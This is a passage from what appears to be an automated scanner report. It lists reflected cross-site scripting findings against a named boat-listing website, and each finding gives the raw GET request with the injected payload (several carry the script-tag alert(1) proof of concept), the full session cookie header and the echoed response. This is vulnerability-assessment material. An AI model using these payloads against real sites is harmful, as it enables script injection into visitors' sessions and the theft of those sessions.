User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:01 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type2e177"><script>alert(1)</script>960cd3935d4/260+Cruiser">
...[SNIP]...

3.234. http://www.yachtworld.com/boats/category/type/Four+Winns/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Four+Winns/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edd89"><a>15bb0a511b8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Four+Winnsedd89"><a>15bb0a511b8/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:02 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Four+Winnsedd89"><a>15bb0a511b8/A-1">
...[SNIP]...

3.235. http://www.yachtworld.com/boats/category/type/Four+Winns/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Four+Winns/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2059"><script>alert(1)</script>a0010bc719c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Four+Winns/1d2059"><script>alert(1)</script>a0010bc719c HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:12 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Four+Winns/1d2059"><script>alert(1)</script>a0010bc719c/A-1">
...[SNIP]...

3.236. http://www.yachtworld.com/boats/category/type/Grady+White/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Grady+White/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1b83"><a>19572220db1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/typed1b83"><a>19572220db1/Grady+White/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:47 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/typed1b83"><a>19572220db1/Grady+White/1">
...[SNIP]...

3.237. http://www.yachtworld.com/boats/category/type/Grady+White/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Grady+White/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf59d"><a>3b1efa8d3d0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Grady+Whitebf59d"><a>3b1efa8d3d0/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:56 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Grady+Whitebf59d"><a>3b1efa8d3d0/A-1">
...[SNIP]...

3.238. http://www.yachtworld.com/boats/category/type/Grady+White/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Grady+White/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 304f2"><a>dbf459730e4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Grady+White/1304f2"><a>dbf459730e4 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
